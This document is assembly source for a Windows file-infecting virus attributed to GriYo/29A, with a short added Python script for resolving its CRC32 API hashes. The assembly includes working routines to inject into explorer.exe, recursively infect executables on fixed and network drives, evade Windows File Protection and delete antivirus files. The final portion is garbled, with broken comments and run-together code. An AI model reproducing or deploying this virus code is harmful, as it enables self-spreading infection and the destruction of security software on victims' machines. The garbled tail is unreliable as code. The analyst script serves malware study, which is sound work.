;       ebx -> KERNEL32 base address
; On exit:
;       ecx -> address of GetProcAddress
;===========================================================================

GetGetProcAddr: cld
                mov     eax,dword ptr [ebx+IMAGE_DOS_HEADER.MZ_lfanew]
                mov     edx,dword ptr [eax+ebx+NT_OptionalHeader.\
                                       OH_DirectoryEntries.\
                                       DE_Export.\
                                       DD_VirtualAddress]
                add     edx,ebx
                mov     esi,dword ptr [edx+ED_AddressOfNames]
                add     esi,ebx
                mov     edi,dword ptr [edx+ED_AddressOfNameOrdinals]
                add     edi,ebx
                mov     ecx,dword ptr [edx+ED_NumberOfNames]
function_loop:  lodsd
                push    edx
                push    esi
                lea     esi,dword ptr [eax+ebx]         ; get ptr to API name
                call    get_str_crc32                   ; get crc32 of API name
                pop     esi
                cmp     edx,dword ptr [ebp+crcGetProcAddr]
                je      api_found
                inc     edi
                inc     edi                             ; next word ordinal
                pop     edx
                loop    function_loop
                ret                                     ; ecx = 0 -> not found
api_found:      pop     edx
                movzx   eax,word ptr [edi]
                sub     eax,dword ptr [edx+ED_BaseOrdinal]
                inc     eax
                shl     eax,02h
                mov     esi,dword ptr [edx+ED_AddressOfFunctions]
                add     esi,eax                         ; index into the address table
                add     esi,ebx
                lodsd
                lea     ecx,dword ptr [eax+ebx]
                ret

;=============================================================================
; Get the entry-point of each needed API
;
; This routine uses the CRC32 instead of API names
;
; On entry:
;       EBX -> base address of DLL
;       ECX -> number of APIs in the following buffer
;       ESI -> buffer filled with the CRC32 of each API name
;       EDI -> receives found API addresses
; On exit:
;       ECX -> is 00000000h if everything was ok
;=============================================================================

get_apis:       cld
get_each_api:   push    ecx
                push    esi
;============================================================
; Get a pointer to the export data
;============================================================
                mov     eax,dword ptr [ebx+IMAGE_DOS_HEADER.MZ_LFANEW]
                mov     edx,dword ptr [eax+\
                                       ebx+\
                                       NT_OPTIONALHEADER.\
                                       OH_DIRECTORYENTRIES.\
                                       DE_EXPORT.\
                                       DD_VIRTUALADDRESS]
                add     edx,ebx
                mov     esi,dword ptr [edx+ED_ADDRESSOFNAMES]
                add     esi,ebx
                mov     ecx,dword ptr [edx+ED_NUMBEROFNAMES]
;============================================================
; Try to find an API name that matches given CRC32
;============================================================
api_loop:       lodsd
                push    esi                     ; ptr to AddressOfNames
                lea     esi,dword ptr [eax+ebx]
                push    esi                     ; save ptr to API name
                call    get_str_crc32
                mov     esi,dword ptr [esp+00000008h]
                lodsd
                cmp     eax,edx
                je      crc_api_found
                pop     eax                     ; remove API name from stack
                pop     esi                     ; ptr to RVA for next API name
                loop    api_loop
get_api_error:  pop     esi                     ; ptr to CRC's of API names
                pop     ecx                     ; number of API's
                ret                             ; exit with error (ECX != NULL)
;============================================================
; The ptr to API name is already on stack, now push the
; module handle and call GetProcAddress
;============================================================
crc_api_found:  push    ebx
                call    dword ptr [ebp+a_GetProcAddress]
                cld                             ; dont let the API call change this
                pop     edx                     ; remove ptr to RVA for next name
                or      eax,eax
                jz      get_api_error           ; if GetProcAddress returned NULL exit
                stosd                           ; save the API address into given table
                pop     esi                     ; ptr to CRC's of API names
                lodsd
                pop     ecx
                loop    get_each_api
                ret
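Both GetGetProcAddr and get_apis only ever compare a 32-bit CRC constant against the exports of a DLL, so the names are not in the binary at all. The added example below (analysis code, not part of the Fever/Dengue source) rebuilds that mapping the way an analyst would: it parses a PE32 export table and hashes every exported name, then looks up the constants pulled from a sample. It assumes get_crc32 is the standard IEEE CRC-32 (what zlib.crc32 computes); get_crc32 itself is not on this page, and since get_str_crc32 leaves the NUL counted in ECX, the helper hashes each name both with and without the terminator. The "DLL" it runs on is a minimal PE32 image constructed inline so that the script runs offline.

```python
"""Rebuild API names from CRC-32 constants by walking a PE export table.

Added example for analysis, not code from the Fever/Dengue source.  Assumes
get_crc32 is the standard IEEE CRC-32 (zlib.crc32); the sample DLL is a
minimal PE32 image constructed inline.
"""
import struct
import zlib


def crc32_name(name: bytes, include_nul: bool = False) -> int:
    # get_str_crc32 counts the NUL into ECX, so whether the terminator is hashed
    # depends on get_crc32 (not shown on the page): compute both variants.
    return zlib.crc32(name + b"\x00" if include_nul else name) & 0xFFFFFFFF


def _rva_to_offset(sections, rva: int) -> int:
    for va, vsize, raw, rawsize in sections:
        if va <= rva < va + max(vsize, rawsize):
            return rva - va + raw
    raise ValueError(f"RVA {rva:#x} is outside every section")


def parse_exports(image: bytes) -> dict:
    """Return {name: rva} for the named exports of a PE32 file image."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ signature")
    pe = struct.unpack_from("<I", image, 0x3C)[0]                 # e_lfanew
    if image[pe:pe + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature")
    nsec = struct.unpack_from("<H", image, pe + 6)[0]
    opt_size = struct.unpack_from("<H", image, pe + 20)[0]
    opt = pe + 24
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    export_rva = struct.unpack_from("<I", image, opt + 96)[0]     # DataDirectory[EXPORT]
    sections = []
    for i in range(nsec):
        sh = opt + opt_size + 40 * i
        vsize, va, rawsize, raw = struct.unpack_from("<IIII", image, sh + 8)
        sections.append((va, vsize, raw, rawsize))
    if not export_rva:
        return {}
    ed = _rva_to_offset(sections, export_rva)
    (_, _, _, _, _, _base, nfuncs, nnames,
     aof, aon, aono) = struct.unpack_from("<IIHHIIIIIII", image, ed)
    funcs, names, ords = (_rva_to_offset(sections, r) for r in (aof, aon, aono))
    exports = {}
    for i in range(nnames):
        name_off = _rva_to_offset(sections, struct.unpack_from("<I", image, names + 4 * i)[0])
        name = image[name_off:image.index(b"\x00", name_off)]
        # AddressOfNameOrdinals is a 0-based index into AddressOfFunctions; the
        # virus's "ordinal - Base + 1" agrees with this only when Base == 1.
        idx = struct.unpack_from("<H", image, ords + 2 * i)[0]
        if idx < nfuncs:
            exports[name] = struct.unpack_from("<I", image, funcs + 4 * idx)[0]
    return exports


def resolve_hashes(image: bytes, wanted) -> dict:
    """Map each wanted CRC-32 to (name, rva, hashed_with_nul)."""
    table = {}
    for name, rva in parse_exports(image).items():
        for nul in (False, True):
            table.setdefault(crc32_name(name, nul), (name.decode(), rva, nul))
    return {h: table[h] for h in wanted if h in table}


def build_sample_dll(names) -> bytes:
    """Constructed sample: a PE32 with one section whose RVAs equal file offsets."""
    base, opt = 0x1000, 0x58
    img = bytearray(0x2000)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)
    img[0x40:0x44] = b"PE\x00\x00"
    struct.pack_into("<HHIIIHH", img, 0x44, 0x14C, 1, 0, 0, 0, 0xE0, 0x2102)
    struct.pack_into("<H", img, opt, 0x10B)
    struct.pack_into("<I", img, opt + 92, 16)                     # NumberOfRvaAndSizes
    struct.pack_into("<II", img, opt + 96, base, 0x1000)          # export directory
    sh = opt + 0xE0
    img[sh:sh + 6] = b".edata"
    struct.pack_into("<IIII", img, sh + 8, 0x1000, base, 0x1000, base)
    n = len(names)
    aof, aon, aono = base + 40, base + 40 + 4 * n, base + 40 + 8 * n
    struct.pack_into("<IIHHIIIIIII", img, base, 0, 0, 0, 0, 0, 1, n, n, aof, aon, aono)
    cur = aono + 2 * n
    for i, name in enumerate(names):
        struct.pack_into("<I", img, aof + 4 * i, 0x1800 + 0x10 * i)   # fake code RVA
        struct.pack_into("<I", img, aon + 4 * i, cur)
        struct.pack_into("<H", img, aono + 2 * i, i)
        img[cur:cur + len(name)] = name
        cur += len(name) + 1
    return bytes(img)


if __name__ == "__main__":
    dll = build_sample_dll([b"ExitProcess", b"GetProcAddress", b"LoadLibraryA"])
    for h, (name, rva, nul) in resolve_hashes(dll, {crc32_name(b"GetProcAddress")}).items():
        print(f"{h:08X} -> {name} @ RVA {rva:#x} (NUL hashed: {nul})")
```

On a real sample, feed `resolve_hashes` the bytes of the kernel32.dll (and, for VirLoadLib, every DLL in the system directory) from the same Windows generation as the victim, with the CRC table lifted from the decrypted body; a constant that resolves under neither hashing convention usually means a different polynomial or a pre-processed name, not a missing export.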

;=============================================================================
; Find base address of kernel32.dll
; Thanks to Jacky Qwerty for the SEH routines
;=============================================================================

SEH_BLOCK_0000  macro
                add     esp,-cPushad
                jnz     GNTBA_L1
                endm

iGetNTBaseAddr: @SEH_SetupFrame <SEH_BLOCK_0000>
                mov     ecx,edx
                xchg    ax,cx
GNTBA_L0:       dec     cx
                jz      GNTBA_L2
                add     eax,-10000h                     ; walk down 64K pages
                pushad
                mov     bx,-IMAGE_DOS_SIGNATURE
                add     bx,word ptr [eax]               ; page fault here lands in the SEH block
                mov     esi,eax
                jnz     GNTBA_L1
                mov     ebx,-IMAGE_NT_SIGNATURE
                add     eax,dword ptr [esi.MZ_LFANEW]
                mov     edx,esi
                add     ebx,dword ptr [eax]
                jnz     GNTBA_L1
                add     edx,[eax.NT_OPTIONALHEADER.OH_DIRECTORYENTRIES.\
                             DE_EXPORT.DD_VIRTUALADDRESS]
                add     esi,dword ptr [edx.ED_NAME]
                lea     edi,dword ptr [ebp+BufStrFileName]
                call    parse_filename
                mov     esi,edx
                call    get_str_crc32
                cmp     edx,dword ptr [ebp+crcKERNEL32]  ; is kernel32.dll?
                je      K32_F
GNTBA_L1:       popad
                jmp     GNTBA_L0
K32_F:          popad
                xchg    ecx,eax
                inc     eax
GNTBA_L2:       @SEH_RemoveFrame
                ret

;=============================================================================
; VirLoadLib
;
; To use CRC32 instead of API names sounds cool... but there are still some
; strings authors cant get rid of... when calling LoadLibrary the virus must
; specify the DLL name
;
; This routine is the solution to avoid the usage of DLL names
;
; On entry:
;       EAX -> CRC32 of DLL name
;       ESI -> CRC32 of API names
;       EDI -> where to put API addresses
;       ECX -> number of APIs to find
; On exit:
;       EAX -> module handle or NULL on error
;=============================================================================

VirLoadLib:     push    ecx
                push    esi
                push    edi
                mov     dword ptr [ebp+a_sDLL_CRC32],eax
                lea     eax,dword ptr [ebp+DirectFindData]
                push    eax                                     ; lpFindFileData
                lea     eax,dword ptr [ebp+szSystemDir]         ; lpFileName
                push    eax
                call    dword ptr [ebp+a_FindFirstFileA]
                cmp     eax,INVALID_HANDLE_VALUE
                jz      EVirLoadLib
                mov     dword ptr [ebp+h_Find],eax
CheckDllName:   lea     esi,dword ptr [ebp+DirectFindData+WFD_SZFILENAME]
                lea     edi,dword ptr [ebp+BufStrFileName]
                call    parse_filename
                mov     esi,edx
                call    get_str_crc32
                cmp     edx,dword ptr [ebp+a_sDLL_CRC32]
                je      OkCheckDll
                lea     eax,dword ptr [ebp+DirectFindData]
                push    eax                                     ; lpFindFileData
                push    dword ptr [ebp+h_Find]                  ; hFindFile
                call    dword ptr [ebp+a_FindNextFileA]
                or      eax,eax
                jnz     CheckDllName
EVirLoadLib:    pop     edi
                pop     esi
                pop     ecx
                xor     eax,eax
                ret
OkCheckDll:     lea     esi,dword ptr [ebp+szSystemDir]
                lea     edi,dword ptr [ebp+BufStrFileName]
                push    edi
                call    parse_filename
                lea     esi,dword ptr [ebp+DirectFindData+WFD_SZFILENAME]
                mov     edi,edx                                 ; overwrite the search mask
                call    parse_filename                          ; with the found DLL name
                call    dword ptr [ebp+a_LoadLibraryA]
                or      eax,eax
                jz      EVirLoadLib
                mov     ebx,eax
                pop     edi
                pop     esi
                pop     ecx
                call    get_apis
                jecxz   OkVirLoadLib
                push    ebx
                call    dword ptr [ebp+a_FreeLibrary]
                xor     eax,eax
                ret
OkVirLoadLib:   mov     eax,ebx
                ret

;=============================================================================
; This routine takes a string pointed by ESI and copies
; it into a buffer pointed by EDI
;
; The result string will be converted to upper-case
;
; On entry:
;       ESI -> pointer to source string
;       EDI -> pointer to returned string
;
; On exit:
;       AL  -> NULL
;       EDX -> points to character next to last '\'
;       EDI -> points 1 byte above the NULL terminator
;=============================================================================

parse_filename: mov     edx,edi
                cld
ScanZString:    lodsb
                cmp     al,'a'
                jb      no_upper
                cmp     al,'z'
                ja      no_upper
                and     al,0DFh                 ; 'a'..'z' -> 'A'..'Z'
no_upper:       stosb
                cmp     al,'\'
                jne     err_slash_pos
                mov     edx,edi
err_slash_pos:  or      al,al
                jnz     ScanZString
                ret

;=============================================================================
; Copyright notice and disclaimer
;=============================================================================

copyright       db      '[Dengue Hemorrhagic Fever '
                db      'BioCoded by GriYo/29A]'
disclaimer      db      'Disclaimer: this software has been designed '
                db      'for research purposes only. The author is '
                db      'not responsible for any problems caused due to '
                db      'improper or illegal usage of it'

;=============================================================================
; Virus initialization (inside explorer.exe)
;=============================================================================

ExplorerInit:   call    ExplorerDelta
ExplorerDelta:  pop     ebp
                sub     ebp,offset ExplorerDelta
;============================================================
; Get current local time
;============================================================
FreeExplorerOk: lea     esi,dword ptr [ebp+local_time]
                push    esi
                call    dword ptr [ebp+a_GetLocalTime]
;============================================================
; Initialize random number generator seed using current
; year and current month
;============================================================
                cld
                lodsw                                   ; SYSTEMTIME.wYear
                rol     eax,10h
                lodsw                                   ; SYSTEMTIME.wMonth
                mov     dword ptr [ebp+rnd32_seed],eax
;============================================================
; Locate kernel32 code section in memory... this information
; will be used later in the EPO routines
;============================================================
                mov     ebx,dword ptr [ebp+hKernel32]
                call    get_code_sh
                mov     eax,dword ptr [edi+SH_VIRTUALADDRESS]
                add     eax,ebx
                mov     dword ptr [ebp+K32CodeStart],eax
                add     eax,dword ptr [edi+SH_VIRTUALSIZE]
                mov     dword ptr [ebp+K32CodeEnd],eax
;============================================================
; Sleep for a moment, before start making noise
;============================================================
                push    00005000h
                call    dword ptr [ebp+a_Sleep]
;============================================================
; Load imagehlp.dll
;
; The ImageHlp functions are supported by the Microsoft
; Windows NT, Windows 95, and Windows 98 operating systems...
; They are used mostly by programming tools, application setup
; utilities, and other programs that need access to the data
; contained in a PE image
;============================================================
                mov     eax,dword ptr [ebp+crcszImgHlp]
                mov     ecx,NumImgHlpApis
                lea     esi,dword ptr [ebp+crc32ImgHlpApis]
                lea     edi,dword ptr [ebp+EpImgHlpApis]
                call    VirLoadLib
                mov     dword ptr [ebp+hImgHlp],eax
;============================================================
; Load sfc.dll (Windows 2000 only)
;============================================================
                mov     dword ptr [ebp+hSFC],00000000h
                cmp     dword ptr [ebp+dwMajorVersion],00000005h
                jb      Ready2Infect
                mov     eax,dword ptr [ebp+crcszSFC]
                mov     ecx,NumSFCApis
                lea     esi,dword ptr [ebp+crc32SFCApis]
                lea     edi,dword ptr [ebp+EpSFCApis]
                call    VirLoadLib
                mov     dword ptr [ebp+hSFC],eax
;============================================================
; Initialization inside explorer.exe complete...
;
; Now create a thread to search for files to infect and
; get control back to explorer.exe
;============================================================
Ready2Infect:   lea     eax,dword ptr [ebp+if_ThreadId]
                push    eax                                     ; lpThreadId
                xor     edx,edx
                push    edx                                     ; dwCreationFlags
                push    edx                                     ; lpParameter
                lea     eax,dword ptr [ebp+InfectionThread]
                push    eax                                     ; lpStartAddress
                push    edx                                     ; dwStackSize
                push    edx                                     ; lpThreadAttributes
                call    dword ptr [ebp+a_CreateThread]
                or      eax,eax
                jz      AfterThread
                ret                                             ; let the thread run until it terminates
;============================================================
; Free SFC
;============================================================
AfterThread:    mov     eax,dword ptr [ebp+hSFC]
                or      eax,eax
                jz      SfcNotLoaded
                push    eax
                call    dword ptr [ebp+a_FreeLibrary]
;============================================================
; Free ImageHlp
;============================================================
SfcNotLoaded:   mov     eax,dword ptr [ebp+hImgHlp]
                or      eax,eax
                jz      ImgHlpNotLoaded                         ; (not ExitIThread: that would recurse)
                push    eax
                call    dword ptr [ebp+a_FreeLibrary]
ImgHlpNotLoaded: ret

;=============================================================================
; Virus infection thread, created from inside explorer.exe process
;=============================================================================

InfectionThread: call   ThreadDelta
ThreadDelta:    pop     ebp
                sub     ebp,offset ThreadDelta
                lea     esi,dword ptr [ebp+szLogicalDrives]
                mov     edi,SIZEOF_LDSB
                push    esi                                     ; lpBuffer
                push    edi                                     ; nBufferLength
                call    dword ptr [ebp+a_GetLogicalDriveStringsA]
                or      eax,eax
                jz      ExitIThread
                cmp     eax,edi                                 ; buffer too small?
                ja      ExitIThread
;============================================================
; Follow the drives chain
;============================================================
DrivesLoop:     cmp     byte ptr [esi],00h
                jnz     MoreDrives
;============================================================
; Terminate infection thread
;============================================================
ExitIThread:    call    AfterThread
                push    00000000h
                call    dword ptr [ebp+a_ExitThread]            ; leave the thread
;============================================================
; Check drive type, only fixed or remote drives allowed
;============================================================
MoreDrives:     push    esi
                call    dword ptr [ebp+a_GetDriveTypeA]
                cmp     eax,00000003h                           ; DRIVE_FIXED
                je      CheckThisDrive
                cmp     eax,00000004h                           ; DRIVE_REMOTE
                jne     NextDrive
;============================================================
; Got it! Do recursive search on drive
;============================================================
CheckThisDrive: push    esi
                lea     edi,dword ptr [ebp+BufGetDir]
                push    edi
                call    parse_filename
                call    Search4Files
                pop     edi
                pop     esi
NextDrive:      cld
NextDString:    lodsb                                           ; skip to next drive string
                or      al,al
                jnz     NextDString
                jmp     DrivesLoop

;=============================================================================
; Search for targets...
;
; This routine is able to call itself in order to perform a recursive
; search all along the entire directory tree
;=============================================================================

;============================================================
; Store local information on the stack
;============================================================
Search4Files:   sub     esp,SIZEOF_WIN32_FIND_DATA+00000004h
                mov     ebx,esp
; Find frame:
;
;       Path where to perform search (size MAX_PATH)
;       Return address (size DWORD)
;       FindHandle (size DWORD)
;       Find data (size SIZEOF_WIN32_FIND_DATA)

FINDSTACK_PTR2FINDDATA          equ     00000000h
FINDSTACK_PTR2FINDHANDLE        equ     SIZEOF_WIN32_FIND_DATA
FINDSTACK_PTR2RETURNADDRESS     equ     SIZEOF_WIN32_FIND_DATA+00000004h
FINDSTACK_PTR2SEARCHPATH        equ     SIZEOF_WIN32_FIND_DATA+00000008h
;============================================================
; Do FindFirstFile
;============================================================
                push    ebx                                     ; lpFindFileData
                mov     esi,dword ptr [ebx+FINDSTACK_PTR2SEARCHPATH]
                mov     edi,esi
                push    edi                                     ; lpFileName
                call    parse_filename
                dec     edi
                cmp     byte ptr [edi-00000001h],'\'
                jne     RootAware
                dec     edi
RootAware:      mov     eax,'*.*\'                              ; stored as "\*.*"
                stosd
                xor     eax,eax
                stosb
                call    dword ptr [ebp+a_FindFirstFileA]
                cmp     eax,INVALID_HANDLE_VALUE
                je      ErrorFindFirst
                mov     dword ptr [ebx+FINDSTACK_PTR2FINDHANDLE],eax
;============================================================
; Find data ready to be checked
;============================================================
GoFindRecord:   lea     esi,dword ptr [ebx+WFD_SZFILENAME]
                cld
                lodsd
;============================================================
; Check for . and ..
;============================================================
                cmp     ax,002Eh                                ; "."  + NUL
                je      DoFindNext
                and     eax,00FFFFFFh
                cmp     eax,00002E2Eh                           ; ".." + NUL
                je      DoFindNext
;============================================================
; Check if this is a directory
;============================================================
                mov     eax,dword ptr [ebx]                     ; WFD_dwFileAttributes
                test    eax,FILE_ATTRIBUTE_DIRECTORY
                jz      DoFileFound
;============================================================
; Directory found, perform recursive search on it
;============================================================
                push    ebx
                mov     esi,dword ptr [ebx+FINDSTACK_PTR2SEARCHPATH]
                sub     esp,MAX_PATH
                mov     edi,esp
                push    edi
                call    parse_filename
                lea     esi,dword ptr [ebx+WFD_SZFILENAME]
                mov     edi,edx                                 ; replace "*.*" by the dir name
                call    parse_filename
                call    Search4Files
                pop     edi
                add     esp,MAX_PATH
                pop     ebx
                jmp     DoFindNext
;============================================================
; File found, check if its a valid host
;============================================================
DoFileFound:    and     eax,FILE_ATTRIBUTE_DIRECTORY or \
                        FILE_ATTRIBUTE_COMPRESSED or \
                        FILE_ATTRIBUTE_SYSTEM
                jnz     DoFindNext
;============================================================
; Save file time
;============================================================
                cld
                lea     esi,dword ptr [ebx+WFD_FTCREATIONTIME]
                lea     edi,dword ptr [ebp+ft_CreationTime]
                movsd                                   ; ftCreationTime   (dwLowDateTime)
                movsd                                   ; ftCreationTime   (dwHighDateTime)
                movsd                                   ; ftLastAccessTime (dwLowDateTime)
                movsd                                   ; ftLastAccessTime (dwHighDateTime)
                movsd                                   ; ftLastWriteTime  (dwLowDateTime)
                movsd                                   ; ftLastWriteTime  (dwHighDateTime)
;============================================================
; Check if file size is allowed
;============================================================
                lodsd                                   ; ESI points to WFD_nFileSizeHigh
                or      eax,eax
                jnz     DoFindNext
                lodsd                                   ; WFD_nFileSizeLow
                cmp     eax,0FFFFFFFFh-\
                        (SIZE_VIRTUAL+(NUMBER_OF_POLY_LAYERS*00004000h))
                jae     DoFindNext
                cmp     eax,INF_SIZE
                jbe     DoFindNext
;============================================================
; Save the file size for l8r use
;============================================================
                mov     dword ptr [ebp+FileSizeOnDisk],eax
;============================================================
; Check if file is already infected, using size padding
;============================================================
SIZE_PADDING    equ     00000065h
                mov     ecx,SIZE_PADDING
                xor     edx,edx
                div     ecx
                or      edx,edx
                jz      DoFindNext                      ; size multiple of 65h: treated as infected
;============================================================
; Get complete path+filename and convert it to upper case
;============================================================
                mov     esi,dword ptr [ebx+FINDSTACK_PTR2SEARCHPATH]
                lea     edi,dword ptr [ebp+BufStrFileName]
                call    parse_filename
                lea     esi,dword ptr [ebx+WFD_SZFILENAME]
                mov     edi,edx
                call    parse_filename
;       AL  -> NULL
;       EDX -> points to filename at the end of path
;       EDI -> points 1 byte above the NULL terminator
;============================================================
; Check file extension
;============================================================
                lea     esi,dword ptr [edi-00000005h]   ; ".XXX" + NUL
                call    get_str_crc32
                lea     esi,dword ptr [ebp+tblCrc32szExt]
                mov     ecx,NumberOfExt
CheckExtLoop:   lodsd
                sub     eax,edx
                jnz     NoInterested
;============================================================
; Extension match... infect file
;============================================================
                call    FileInfection
                jmp     short DoFindNext
NoInterested:   loop    CheckExtLoop
;============================================================
; None of infectable extensions match
; Lets see if this file is an AV related file...
;============================================================
                lea     esi,dword ptr [ebp+BufStrFileName]
                mov     edi,esi
                call    parse_filename                  ; parse and reparse
                mov     esi,edx
                call    get_str_crc32
                lea     esi,dword ptr [ebp+tblCrc32AV]
                mov     ecx,NumberOfAV
CheckAVLoop:    lodsd
                sub     eax,edx
                jnz     AVNoMatch
;============================================================
; AV file found... reset its attributes and delete it
;============================================================
                lea     esi,dword ptr [ebp+BufStrFileName]
                push    eax                             ; 00000000h (EAX is zero here)
                push    esi
                call    dword ptr [ebp+a_SetFileAttributesA]
                push    esi
                call    dword ptr [ebp+a_DeleteFileA]
                jmp     short DoFindNext
AVNoMatch:      loop    CheckAVLoop
;============================================================
; Before looking for more files lets sleep a while
;============================================================
DoFindNext:     mov     eax,00000800h
                call    get_rnd_range
                add     eax,00000400h
                push    eax
                call    dword ptr [ebp+a_Sleep]
;============================================================
; Find next directory or file
;============================================================
                push    ebx                                     ; lpFindFileData
                push    dword ptr [ebx+FINDSTACK_PTR2FINDHANDLE]
                call    dword ptr [ebp+a_FindNextFileA]
                or      eax,eax
                jnz     GoFindRecord
ErrorFindFirst: mov     eax,00002000h
                call    get_rnd_range
                add     eax,00001000h
                push    eax
                call    dword ptr [ebp+a_Sleep]
                push    dword ptr [ebx+FINDSTACK_PTR2FINDHANDLE]
                call    dword ptr [ebp+a_FindClose]
                mov     esp,ebx
                add     esp,SIZEOF_WIN32_FIND_DATA+00000004h
                ret

;=============================================================================
; Infect PE files
;
; On entry:
;       BufStrFileName -> buffer that contains complete path and
;                         filename
;       DirectFindData -> WIN32_FIND_DATA structure filled with
;                         information about the file to infect
;=============================================================================

FileInfection:  push    ebx
                lea     esi,dword ptr [ebp+BufStrFileName]
                mov     edi,esi
                call    parse_filename
                mov     esi,edx
;*****************************************************************************
; (test build only: restrict infection to files named GOAT*)
;               mov     eax,dword ptr [esi]
;               cmp     eax,'TAOG'
;               jne     ExitFileInf
;*****************************************************************************
;============================================================
; Avoid some files from being infected
;============================================================
CheckFileName:  push    esi
                mov     ecx,00000002h                   ; CRC32 of every 2-char window
                call    get_crc32                       ; of the name, up to the '.'
                lea     esi,dword ptr [ebp+Avoid_Tbl]
                mov     ecx,Avoid_Num
AvoidLoop:      lodsd
                cmp     eax,edx
                jne     NextAvoid
                pop     esi
                jmp     ExitFileInf
NextAvoid:      loop    AvoidLoop
                pop     esi
                lodsb
                cmp     al,'.'
                jne     CheckFileName
;============================================================
; Check if file is protected by Windows File Protection
; (Windows 2000 only)
;============================================================
                cmp     dword ptr [ebp+hSFC],00000000h
                jz      NotProtected
                lea     eax,dword ptr [ebp+BufStrFileName]
                push    eax                             ; ProtFileName (SfcIsFileProtected
                push    00000000h                       ; RpcHandle     expects LPCWSTR; an
                call    dword ptr [ebp+a_SfcIsFileProtected] ;          ANSI buffer is passed)
                or      eax,eax
                jnz     ExitFileInf
;============================================================
; Try to infect this file
;============================================================
NotProtected:   call    TryAttach
;============================================================
; Exit file infection
;============================================================
ExitFileInf:    pop     ebx
                ret

; ================================================== ===========================

Infect File Routines

;

On Entry:

BUFSTRFILENAME -> Buffer Filled with Path FileName

; ================================================== ===========================

SEH_BLOCK_0001 Macro

Add ESP, -CPUSHAD

JNZ APE_ERR

ENDM

; ================================================== ===========; Open Target File for Read-Only Access

; ================================================== ===========

Tryattach: Call Filemapro

OR EAX, EAX

JZ INF_FILE_ERR

; ================================================== ===========

Register EBX Contains The Base Address of The Target File

ALL Along Infection Routines

; ================================================== ===========

MOV EBX, EAX

; ================================================== ===========

Check for MZ Signature At Base Address; =========================================== ===================

CLD

CMP Word PTR [EBX], Image_DOS_SIGNATURE

JNE INF_CLOSE_FILE

; ================================================== ===========

Check File Address of Relocation Table

; ================================================== ===========

CMP Word PTR [EBX MZ_LFARLC], 0040H

JB INF_CLOSE_FILE

; ================================================== ===========

Now Go to the Pe Header and Check for the PE SIGNATURE

; ================================================== =========== Mov ESI, DWORD PTR [EBX MZ_LFANEW]

MOV EAX, DWORD PTR [EBP FileSizeOnDisk]

SHR EAX, 01H

CMP ESI, EAX

JAE INF_CLOSE_FILE

Add ESI, EBX

Lodsd

CMP EAX, Image_NT_SIGNATURE

JNE INF_CLOSE_FILE

; ================================================== ===========

Check Machine Field In Image_File_Header

; Just Allow i386 PE Files

; ================================================== ===========

CMP Word PTR [ESI FH_MACHINE], Image_FILE_MACHINE_I386

JNE INF_CLOSE_FILE

; ================================================== ===========

Now Check The Characteristics, Look IF File

IS an executable

; ================================================== =========== Mov AX, Word PTR [ESI FH_CHARACTERISTICS]

Test AX, Image_File_executable_image or /

Image_file_32bit_machine

JZ INF_CLOSE_FILE

; ================================================== ===========

Avoid DLL'S

; ================================================== ===========

Removed to allow .cpl infection

;

Test AX, Image_File_DLL

JNZ INF_CLOSE_FILE

; ================================================== ===========

; Virus Resides on Last Section

; ================================================== =========== Call GET_LAST_SH

JECXZ INF_CLOSE_FILE

; ================================================== ===========

Check Subsystem, ONLY GUI Applications Allowed

; ================================================== ===========

Movzx Eax, Word PTR [ESI OH_SUBSYSTEM]

CMP EAX, Image_Subsystem_Windows_gui

JNE INF_CLOSE_FILE

; ================================================== ===========

; Save RVA of Last Section

; ================================================== ===========

Mov Eax, EDI

Sub Eax, EBXMOV DWORD PTR [EBP VIRUS_SH], EAX

; ================================================== ===========

This is an attempt to avoid offending pe file formats

; ================================================== ===========

Mov Eax, DWORD PTR [EDI SH_POINTERTORAWDATA]

Add Eax, DWORD PTR [EDI SH_SIZEOFRAWDATA]

Add Eax, DWORD PTR [ESI OH_FILALIGNMENT]

CMP EAX, DWORD PTR [EBP FileSizeOnDisk]

JB INF_CLOSE_FILE

; ================================================== ===========

Save a Pointer to Imports

; ================================================== ===========

MOV EAX, DWORD PTR [ESI /

OH_DATADIRECTORY /

DE_IMPORT /

DD_VIRTUALADDRESS]

MOV DWORD PTR [EBP FileImport], EAX

; ================================================== ===========; Go to Relocations

; ================================================== ===========

MOV EAX, DWORD PTR [ESI /

OH_DATADIRECTORY /

DE_BASERELOC /

DD_VIRTUALADDRESS]

OR EAX, EAX

JZ Cant_OverWrite

; ================================================== ===========

; RELOCATIONS Section Is The Last Section?

; ================================================== ===========

SUB EAX, DWORD PTR [EDI Sh_VIRTUALADDRESS]

JZ GOT_VIR_OFFSET

; ================================================== ===========; We Cant Overwrite Relocations ...

; ... lets attach the virus to the end of last section

; ================================================== ===========

Cant_overwrite: Mov Eax, DWORD PTR [EDI Sh_SIZEOFRAWDATA]

MOV EDX, DWORD PTR [EDI Sh_VIRTUALSIZE]

CMP EAX, EDX

JAE GOT_VIR_OFFSET

MOV EAX, EDX

GOT_VIR_OFFSET: Add Eax, DWORD PTR [EDI SH_POINTERTORAWDATA]

MOV DWORD PTR [EBP VIR_OFFSET], EAX

; ================================================== ===========

; Search Inside Host Code ...

; ================================================== ===========

@Seh_setupframe

XOR ECX, ECX

Pushhad

Call doepo

MOV DWORD PTR [ESP PUSHAD_ECX], ECX

APE_ERR: POPAD

@Seh_removeframe

JECXZ INF_CLOSE_FILEMOV DWORD PTR [EBP INJECT_OFFS], ECX

; ================================================== ===========

Close File ...

; ================================================== ===========

Call fileunmapro

; ================================================== ===========

; ... and remap with iversize

; ================================================== ===========

Call filemaprw

OR EAX, EAX

JZ INF_FILE_ERR

Add DWORD PTR [EBP VIRUS_SH], EAX

MOV EBX, EAX

; ================================================== ===========

Move virus to file; ============================================= ================

Lea ESI, DWORD PTR [EBP VIRO_SYS]

MOV EDI, DWORD PTR [EBP VIR_OFFSET]

Add Edi, EBX

Push EDI

MOV ECX, INF_SIZE

CLD

REP MOVSB

; ================================================== ===========

Save Original Code

; ================================================== ===========

MOV ESI, DWORD PTR [EBP INJECT_OFFS]

Add ESI, EBX

POP EDI

Push EDI

Add Edi, ORG_CODE-VIRO_SYS

CLD

Movsb

Movsd

; ================================================== ===========

; Save Some Registers on 1st Decryptor

; ================================================== =========== Mov ECX, 00000004H

Push ECX

Lea EDI, DWORD PTR [EBP TBLSTDPSHP]

CLD

Cleanstdloop: Mov Eax, 00000004H

Sub Eax, ECX

Stosd

Loop cleanstdloop

POP ECX
